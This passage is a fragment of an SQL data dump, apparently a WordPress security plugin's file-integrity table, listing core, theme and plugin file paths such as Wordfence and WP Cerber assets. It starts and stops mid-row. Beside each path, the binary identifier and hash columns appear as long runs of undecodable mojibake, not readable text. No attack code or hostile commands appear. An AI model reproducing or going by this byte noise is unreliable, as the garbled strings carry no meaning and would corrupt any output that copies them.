������','u=ˊ��h����]�?(�{D���6_�F��','',0,'?'),('�+���.��eF��','wp-admin/css/dashboard.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��dܷ\0��d\'���','%�=r�WX%���x�{�T�t�l;#E�lXy','',0,'?'),('�6�n��[l��v񺦼q','wp-content/plugins/wp-cerber/assets/flags/bl.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�L,������Ֆ4�','=D�wN��+UaF�0�^.sG�����?���','',0,'?'),('�9e���kk�R�o���S','wp-includes/embed.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�V\0�[R�>��Sj�$^�','6K�(|�/�R��̵�;$.�Jf8{�v�G�','',0,'?'),('�G��5�@����07��','wp-includes/images/blank.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ʟg��h�kK��f','>��E�G��L�� E��JQ���|�B���ij�','',0,'?'),('�J~_o�f�k�����','wp-includes/js/wp-embed.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�R%�qU�0�8}_��','ޚT�d����U�2#*_�D�WQT�n�I%Ǭ�','',0,'?'),('恴L�ޠe���/�u�','wp-content/plugins/wp-cerber/assets/scanner.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�cY�\0����в�^�+','��N�eX��F2\\�-0t�8Fp�ɤVێ\0��','',0,'?'),('様��7�^�b�\"�','wp-content/plugins/wordfence/images/back_disabled.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','h���g��i���>','�䏛N�7�g΋�?�Fb!}��ݿ��C��鳇','',0,'?'),('�g��wߍ�hm���A�','wp-includes/blocks/freeform/editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���Z�%,̰�YN�','	�b�I9��w3ݱ�r?�2&WO�щmM�','',0,'?'),('�y�l��s�U>�<��','wp-includes/css/customize-preview.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��b���Sb�s��\"','ߌ��I�R�\\Ĺ�e��z3�QsC����Q�','',0,'?'),('����eҕ�h�V�\"�','wp-content/plugins/wordfence/views/options/block-controls.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�B��#j�T�,	���D','x��L�a);�%��Ƶ���R*���','',0,'?'),('��W���\"���Sk:�','wp-admin/images/align-center-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���-�r�5*J7�If','�8tf�*Jw�T�^��H�>���1�JD�ο','',0,'?'),('����P�IcD��ƾ�','wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/random_int.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����J�s��Ǚ�B','��ER��Jb�ȸI\"��t�],�qP�1\\fD','',0,'?'),('�⣣�M�O����U�','wp-admin/js/editor.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' �*������{~��.','�\n��÷�˞x\'0 W~Ы��Z�src9��=','',0,'?'),('���\"�LJ1�C4ND�','wp-content/plugins/wordfence/views/scanner/issue-wfPluginAbandoned.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�pD*����L}�','��f‰���ƾߜ=i���s�8�\Z}�����','',0,'?'),('��JI�K3���-C��5','wp-content/themes/newsmagbd/inc/core.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`�^���V�ˬN�{n�','^�`�;p��EKh,9�\"/�p�֋���^,�#�b','',0,'?'),('���;�W����l�','wp-includes/js/dist/deprecated.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��::�̿&D�P��\0�','�X�\r #a܅�\rH���#4�Z=�B]X�#�қ','',0,'?'),('�]:]6Q(s-�B��','wp-content/plugins/wp-cerber/assets/flags/so.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��9�:�vU:{��','I���˱��	-���f�rǏc�k��@�3�`	=','',0,'?'),('�\"�ơ���7vs+�','wp-admin/includes/class-pclzip.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��9MY�^mluRg','\0\rhV!\Z7\Z�虁�K`2�_\\H	��G\n�;=','',0,'?'),('�2\Z� {D�Z���-','wp-content/plugins/wordfence/fonts/ionicons.woff',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���h��I�15[I]J','*��\\&�t䭨\\�	gTw�����,�1���','',0,'?'),('�Djמ�8]fД_�','wp-includes/class-wp-widget.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','H`�Ō�D��xj��dD','�:��[�8�4���q�7S��d��g×(�*3','',0,'?'),('�b`K�\'��컜���K','wp-includes/functions.wp-scripts.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ި�,��V!�)p','Y|k�F��6a��[�tv.��K^�d�M�)onD','',0,'?'),('�x�Δ)NX3u/@�4Y�','wp-includes/rest-api/endpoints/class-wp-rest-block-types-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�a+�U�[*�����','1x�: r$Ó�ѯ��D>�`�K~��T6lm�','',0,'?'),('�J��ёe�\rXd��$�','wp-includes/class-wp-customize-widgets.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','mc��(�?����K^','Ȱ�f�w~�L\\��\r�����6��ʟ�N��','',0,'?'),('�\Z�I�������','wp-includes/blocks/social-links/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','l�	af\00M/��\Z�','�VM7�|�r��@\r{1w6��{&��m[r��','',0,'?'),('�kN�>t��,���','wp-includes/blocks/file/editor-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�x��M��T�o','H�4|QG��F�]�iu�>bL.NQ`g}\r\\�','',0,'?'),('���K�g���o#�0','wp-activate.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m�#w:m���2��A\"','���^>�*���r���I+��{�ф�U�b�&�','',0,'?'),('�ʼn�	i��/Э','wp-includes/formatting.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�W����F�����5�','�$hp�>�4������S�Y�>X�B�ٙ','',0,'?'),('��H���l��{!D#�!','wp-admin/js/color-picker.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����\ri)]f�m�+e�','i16�:��	n�s!�F���n��A��R6�/�NE','',0,'?'),('���L�.dDv��','wp-content/plugins/wordfence/views/scanner/issue-wpscan_directoryList.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\n����aH{ڶ��ER�N','տ����o\Z���^�J��U�B�l�5���\n�','',0,'?'),('��F�ZY��C8��3E','wp-admin/css/colors/blue/colors.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�J��.�&xD�','v��=��E���.��Aͭ%�(DD4uis�','',0,'?'),('��r������� i����','wp-content/themes/newsmagbd/comments.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Z�i�h{߈��6�','#Iz�R���i�)�`l��b���H�i\"�k��','',0,'?'),('��÷�g$�M�s�','wp-content/plugins/wordfence/views/waf/option-rate-limit.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','E,bٿʊ�N��E\\','|J��\Z^(�����׌�xDsX��8��?�R','',0,'?'),('�%y�>}H�o��(6','wp-includes/js/jquery/ui/core.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','I�g{����!�S{5�','�e��%�h�\\f���軙tuv�����R','',0,'?'),('�SHLenP�q7�č�','wp-content/plugins/wordfence/views/scanner/issue-control-edit-post.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','f�����`�j|��y�','i��OGi����F|4�8��V��j�\n#V-L','',0,'?'),('�S�I����#���)|','wp-includes/blocks/quote/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�5��U��b7���','�T�~hqOL�gL����̀;l[0��\"��','',0,'?'),('�b+��a�X����X','wp-content/plugins/wordfence/modules/login-security/views/options/option-ntp.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�!h��\0,� ��%','˃\\B\n��G/͉Cw���9�,$��ŐJ!�8&','',0,'?'),('�f�i�`�=@T��o�','wp-admin/images/spinner.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�L�\nD�\n�oً�j˲�','zƄ�\Z\"��n\Zs�(�U�/~�7��F��^…�','',0,'?'),('�wj0��67���@�T','wp-includes/sodium_compat/namespaced/Core/BLAKE2b.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"�2s7��\\�i#��E','a������t��W��	�3N�\Z��`x�hI�`�','',0,'?'),('�J���y��0m�`�/','wp-includes/class-IXR.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��0���C`q�x�',']���z�p��q�N\"CKW��鴛��c��M','',0,'?'),('��q��8O��;�A','wp-includes/blocks/shortcode/editor-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ͻ�0E���<��#�','I�D�W�=�~7�����(���3E���b$@x`�','',0,'?'),('�\0�]�p��ޑ�	\rG','wp-admin/css/customize-nav-menus.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�!�[��M7q�#�P�n','F����7z+�X�}f�Bc<�CU�<��݀��','',0,'?'),('�s�X�3���f�$','wp-includes/blocks/file.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�O�@�j���?%W3 �',']u|�X�`���\Zҕ��H+a���fx��N�','',0,'?'),('������dvoNf;','wp-content/plugins/redirection/locale/redirection-ru_RU.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��4�!��|b��=��','oX���>BK�vs�p�s���7	W��񦽧�','',0,'?'),('謤j��,����=>','wp-includes/blocks/site-logo/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','D���6;��9�ޝ<��{','I\Z�5��x�J�?��6����jO�Khx[E%_','',0,'?'),('��tU;�56|�4Ql','wp-content/plugins/wp-cerber/assets/select2/dist/js/select2.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���|Ԋ2�3�\\�:=�','��	�<�(*Wv���Ћtw��r_��t�i�	','',0,'?'),('��v�w\n�s�̨H5�','wp-content/plugins/all-in-one-wp-security-and-firewall/js/password-strength-tool.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\ZNj�ک&��U��','B+1�E��}�n�7\Z�z�_��Q�̻�3�&','',0,'?'),('���W����:��]','wp-includes/js/dist/primitives.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ti��|f��6?\rS','��8{������Mz~\0Ke��?.��|n�o� �U','',0,'?'),('��<|Ɔ3#�`�}�','wp-includes/blocks/separator/editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��]=�u\'\\DE�T�','.f�L��]�Ã�Zb�|�%�{�M8�Ƅ�Q�p2^','',0,'?'),('���Q�o�H*���(�','wp-content/plugins/wordfence/images/sort_asc.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',��I��+ƾ��=��','d�C�T�����e&,)Ѵ��FG�\Zd�ON�','',0,'?'),('��U�MU����$�','wp-includes/blocks/latest-posts/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','p�-����\'�u\ZQ��','W�����!kQ��%f�I�\0�ٹ�r?��','',0,'?'),('�+����3�pU','wp-content/plugins/wordfence/lib/wfOnboardingController.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','y�%�̍��ų�<��','ŔWF&�x\Z	�\"�g��ߠ���;�=�D�ٗx','',0,'?'),('�F�j!Y�{.J=,��','wp-admin/images/stars.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[����><�k�{��(�','/	��\"���Fa챔<SY��g���؉F��@','',0,'?'),('�]�W/>�}<8� VF�','wp-admin/includes/theme.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','M�M7�19}�`<��a','�#�������}��<\Z�\'L��}���#���','',0,'?'),('�^.�jT}�<��I��','wp-admin/js/accordion.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','T�� ��R׌q�A��','u��j�h�&Q��\'�+�Gҗ*!9��1$W��m','',0,'?'),('�g���U)\rR(�','wp-includes/js/dist/is-shallow-equal.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�)j#�\Z>���+фd','{{��2��\r�ȼC\r8�y�1R�B��.X','',0,'?'),('�|:��x�Z~�*�wl�','wp-content/plugins/wordfence/modules/login-security/views/options/option-toggled-select.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','n����[f��0�=G�','�[G�f����N����	rG�Ƭ���.','',0,'?'),('�T�B3��G��{','wp-includes/Requests/IPv6.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��nҤ&�i��\r�','�=��ln&�����ă�J�ӗ���~�����l','',0,'?'),('頻�yN<���9�o\Z<','wp-admin/js/xfn.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�<�>B���25�\r1U*�','O	���h^dLgz���Iw�vƄaZ1��','',0,'?'),('�tLH�:��P(��','wp-includes/css/dist/widgets/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','q(c\"c��u(�����','����t��K�^Іf��	\r��=��^����q�','',0,'?'),('��m�Mt���W�B','wp-admin/images/align-left.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\�y0�d�Z�o.h��','�_]�<#�S�\"�B^U4_�Q<!@�x?J$��K�','',0,'?'),('�c�8��x���ϵ','wp-includes/blocks/preformatted/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�)1n8.R���*','v�[��7�/N@3)}�o�x���t�7�Nk��','',0,'?'),('����t���Z�O\'� \n','wp-includes/js/thickbox/macFFBgHack.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ȱg�W�,/u�','Rw�/�h��&q��]Z��_����Ngy��','',0,'?'),('����V,E@�X���y','wp-includes/SimplePie/Cache/File.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','P��8?Q��h׊�','~�`��嫌�<��B\n鲙%]��X}\Zi��','',0,'?'),('��K���6��!T�','wp-includes/blocks/heading/editor.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_�F����`����\\#O','jC,�U�Ma��\\kdD��wi�ۭ�','',0,'?'),('�U���b�f܌�`g','wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-list-registered-users.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[m�L̉Ȗ�j#�D','�����ۚr(o�Ek\"+/bW/r���p��1','',0,'?'),('�kLN\0��x6@','wp-admin/css/list-tables.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','p�>���P����t_','�~�7��H{����]�\r:����\r�c���','',0,'?'),('�-.��x�ɤ�R��','wp-admin/includes/privacy-tools.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�%�d=o�V�x���','��`(���-�n2�\0n?hc���Y��-���','',0,'?'),('�0J����fx�#X{�','wp-includes/sodium_compat/namespaced/File.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']�m�w�/�\\�y5�','�ɐt�d7�H�}=��.t��Cw$�`c��\'�','',0,'?'),('�4���2�)A.;4�','wp-includes/js/customize-preview.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3Q	�!�@�٧T\r','	�Z\\L���\'b�%�i$���\Z\n���F�~','',0,'?'),('�Q�A�	�=H��7-','wp-includes/js/jquery/ui/droppable.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/���_\na��G���','m�U\'mU�7m�N���EFDg;�N�q��~�','',0,'?'),('�d\n�v;�O1:���,Tn','wp-content/plugins/wordfence/views/options/option-toggled-multiple.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��о�6������','r�\nz���>���g�i��\ru��u<��F','',0,'?'),('�r@��D��Z�䯩','wp-includes/sodium_compat/namespaced/Core/Poly1305/State.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�!K�	5y���S*','���Ty�O�%u;�U�}�g�1��)��Z�','',0,'?'),('ꍥ��2jEbg؈W�x�','wp-includes/css/editor-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','M,��|7��\"ߎ\'�','B�����@�{��𵲭�6\r��$υ@�ĭ�+�','',0,'?'),('ꐏF�rH�}@$bF��-','wp-content/plugins/wp-cerber/assets/flags/dz.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��}����Z�A���','~\n����Ào�\'�x�\0��Xh.��}���%�','',0,'?'),('�LJ���4˓T`�k','wp-includes/js/wp-pointer.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"�%��iهkm���','U�Xu��LJ�)G,i��m����5�_��MT_','',0,'?'),('���`I��,�y o�Y','wp-content/plugins/wordfence/vendor/maxmind/web-service-common/LICENSE',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';��8e_�T��ƽW','ݬ�IS�P\"�a�� 7J�6�QSv���_��y�','',0,'?'),('��6�Z�fM���;�','wp-admin/css/site-health-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��H�nM�z{��\0��','����@�L��D��.��I�\0��ń�(c�X','',0,'?'),('�\njݍea!�\ZWd�q','wp-includes/rest-api/fields/class-wp-rest-post-meta-fields.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ٶ��h�rdG�Ͷ','�_7�	2w-Tb�	-��710εA����f','',0,'?'),('�\"�t���3q�?�','wp-includes/blocks/query-title/editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','DX�p��\Z��y?w����','n灴U����¢�H������ZO���h�?\r','',0,'?'),('�-n�$.�#g%�}�','wp-content/plugins/wordfence/lib/Diff/Renderer/Html/SideBySide.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','� �OّCH�ؖs� ','pX���uc{�-�K׏ژ�/OnE0���)JB','',0,'?'),('�0���R�J�{y�ˣ��','wp-includes/general-template.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ѹ0�\ZZ�a�!�$\np�D','\\�u���������Z6������ι','',0,'?'),('�F �8�+�)��r�P�','wp-admin/images/no.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�k�d�$��ܟV7�','\n�>���~h�Z���P\0�U0�;\' {�)	�>','',0,'?'),('�M\Z���H�?ͲZ','wp-includes/class-wp-rewrite.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�c���x�X��C��u%#','ݐ/#N`j�R�1�t+��s�W�]�~S���mǗ','',0,'?'),('�Oӿ�;�=\\J�zy','wp-includes/js/tinymce/plugins/wpgallery/plugin.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Xlo�)\r����\r�\\��','��98�n| �W@ѭ|݃v��p5�����l��','',0,'?'),('�QF�0t�+�����','wp-includes/css/dist/block-library/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Cļ�㰦hJ|:R�5�','bǕM�T-[/\np��Cw\0�1��\\K�����y�','',0,'?'),('�_�1t=qT�Q�*�F�','wp-includes/blocks/gallery/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�xP���F\r��>','K�7G�,.r.��ȯ�e�!A��჋+0J5�4','',0,'?'),('�a��u\"9s?�H����','wp-content/plugins/wordfence/lib/WFLSPHP52Compatability.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��%1�s���ËG','E��Wٳ�?�4��@U?�0���bP�+�h','',0,'?'),('�x�D�.���m~<�2','wp-content/plugins/wordfence/images/ratelimiting.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0[��M�ɞ�yP��','�@����S��y\'�N+�k�B��3�J!PbƖ�','',0,'?'),('�꣇�����E��:�','wp-content/themes/newsmagbd/assets/responsive.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','6~-��,6�ͽ��\"IK','[�|���4�F�T�.���Y��2�`(�6d\Z�qC','',0,'?'),('뭷\r�!z}ML�K�E','wp-includes/ms-files.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z�]G���y��2D','�Z�h�x�^�/������#���Z^N��_\Z','',0,'?'),('��Sڰp��GMǯ�l�','wp-includes/css/media-views.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��y�`vb��2��G�8','�\'�v@Ņ�]�5�$���xK)rj\r�g��','',0,'?'),('�2�|�?�]���ϸ�','wp-includes/css/dist/nux/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\"��:J��k�','i?h�_\'��\Z����_��\n��<a2��m^q','',0,'?'),('���׮F��p�s��4�','wp-content/plugins/wordfence/images/back_enabled.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���]����H��','���9퇥)R�$px#��q ������{#L�O�','',0,'?'),('��vA�ds�����K�]','wp-admin/post.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','xS���v�N���','�� u�����yA�Ү�B���(��B6�����','',0,'?'),('��YC��o�oR�亞�','wp-includes/capabilities.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','c�ӀB�MFe��>��w',',\0�F̬0��|Ї�+��!4$1�Z��R�)a','',0,'?'),('�ۅnPE6��T����','wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/WebService/Http/Request.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��KdW���ؿE�W��','�R��W].da����s��JM�Lq+p�},�','',0,'?'),('�+��^�њ��\r�k','wp-content/plugins/wp-cerber/assets/flags/is.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4o�$�^z1�T�ɪ�','�XƠ8�\'��*ӱ4�$���G\"��JD8�@�6','',0,'?'),('�8�ڧ��s}�ն�Ni','wp-includes/class-phpmailer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'��F!;� 2󱻱4�&','G��ZG����5�_ܚ��XS[W��S:9p@�?�','',0,'?'),('�?����h�����;','wp-includes/js/quicktags.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ʵ��>	%�nK�{<5','mwd���^ʋ�\r��1�^K��(<nV����','',0,'?'),('�D\rh}�����!\n','wp-includes/js/jquery/ui/effect-drop.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�[/�Zo[�Ǵ��/.','ʧ���^5��S]@\"�� 9�~G��[Tv8�7�','',0,'?'),('�MX�?�\n�(�\"�','wp-content/plugins/all-in-one-wp-security-and-firewall/languages/all-in-one-wp-security-and-firewall-ko_KR.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��r�{{�բw%gYp�','�+X҆>hp\\M�i�S�	2���t�]��f��','',0,'?'),('�Pط��悇̺ƴ$@�','wp-includes/SimplePie/HTTP/Parser.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':p��d\'�$�/','��=�D��=u�~�Ju`�Y[�#*�Γ�','',0,'?'),('�V���A`\"�1=�i','wp-content/plugins/redirection/modules/nginx.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','߭h�����[Ix�X5','��9s�ǖ\r���\"�Ě�Q��Mv!���-��','',0,'?'),('�{VcR��>�ԈA��','wp-includes/blocks/code/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','R�����̕{C��c��','����5�$�%\n/����t��\'W&�����','',0,'?'),('�}(^��8,~hyg���','wp-content/plugins/wp-cerber/wp-cerber.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�7U����ག����','|��b�>[�=��4��ϼ�����n.','',0,'?'),('��c��.D�r� |��','wp-includes/js/tinymce/skins/wordpress/images/dashicon-no.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','R���Z�?f.��8��	','��.c%�c�*G~�բ>�Yd���:�7�j','',0,'?'),('츃�v��6�;�~�','wp-includes/js/tinymce/utils/mctabs.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','끡�\"Y����>xU季','%�Y}ڿ�&)���MaYg��Ѝ���*�l�','',0,'?'),('��!<����B4\ZS�}','wp-content/plugins/wordfence/views/scanner/issue-postBadURL.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����le�@1��-�','��+	[P\r�i-��b0m����ƥ�M\"�#��@','',0,'?'),('�[���Ӄ��2�W','wp-content/plugins/wordfence/views/waf/options-group-basic-firewall.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�[><\r�w���w�ɴ','���T;��F����5@>X�s�F�#�&�$','',0,'?'),('�-x�(�E�oI�=�','wp-includes/class-wp-customize-section.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�`;�V�\'���(��)','�<s�Jm�ha�!������U\0(0�D\'�F�','',0,'?'),('�Ư��0~\rjA4u','wp-includes/css/customize-preview-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','E��?��nZ���d�-','G���i�\rl�iU^��n��rm�5��Ώۻ�\\l�','',0,'?'),('�\\�S�Շ��8��;2','wp-includes/class-wp-tax-query.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��}���nBJw�k�0','��,�In����\n��׋�E,��@�h�1����','',0,'?'),('���mה��F@$�~r','wp-content/plugins/wordfence/views/onboarding/disabled-overlay.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��F凅���٥��o�','�?�jr��-��m�(Ǻ���w�?`�Y���~�','',0,'?'),('�4����E\"\nmB*ȇ','wp-content/plugins/redirection/license.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\"9��sF:�t�\rG��','���F�}�Ռ���O�X����	#����#�','',0,'?'),('�N��\'�!\rB�j��3�','wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/LICENSE',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\H��!#���>b�W��','�&�x��w�α�h��)�œ@5m��.)9�R','',0,'?'),('�]��@�\n��>ĺ�Yn','wp-admin/admin-post.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','S}d��D��TN�\"F�','F�ԝ�q��`�멾���r_���Ȩ_���\'��I','',0,'?'),('���I0��B,�hʛp','wp-includes/class-wp-term-query.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����$\0��>c�\rA','\\9�ÆW�->p�>\\ĴG��A�\"K�','',0,'?'),('�������賮]','wp-includes/customize/class-wp-customize-code-editor-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��jM�і���lM��_','�xFZ�Kc��3�7�`Ԫ$j�g�]�Q��','',0,'?'),('�Z�\Z�5\n�j�}�@','wp-includes/blocks/buttons/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\'2u%�Bpp�rJpN5','�DR19��گK;��ye����h�\0.�e�D#F@','',0,'?'),('�F�����m���','wp-content/plugins/wordfence/modules/login-security/views/options/option-label.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|<��>sZ�K�z�e','�̆;�n�E��!��Z�\ZV��V H��w','',0,'?'),('�Z�\ZaYH\0 �5�~ ','wp-admin/includes/class-wp-automatic-updater.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#\0�c%K\"��v�C:�U','.[A�ׄ�9F���\"��DgA4t)ʡh�m�!�','',0,'?'),('�QR\"��@3��v�S','wp-admin/js/link.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','϶�5���֞��P�','O�n��n���˕�{?���Q!�=����V�oi��','',0,'?'),('�(\"A���S^�','wp-content/plugins/redirection/locale/json/redirection-gl_ES.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�3/a^��2�����a(','�|!O\Z~�~b�g޺5%�a��}�ѧ|�^{+<m','',0,'?'),('�G� ��~���`�','wp-includes/customize/class-wp-customize-nav-menu-name-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��7�f�W�՚7���','p��v�w ��ܪ9����?���a���z�','',0,'?'),('��f�W�4���%���','wp-content/plugins/wp-cerber/assets/flags/nz.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X	�7�7��c.�ujߖl','4ȯYI4�T)��H�;�rd�Q��g���Ӆ','',0,'?'),('��M�B�!:�','wp-content/plugins/wp-cerber/assets/flags/it.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{/�z]�>��F@�B�','ⴟ��k �9b��md6�l�{e� 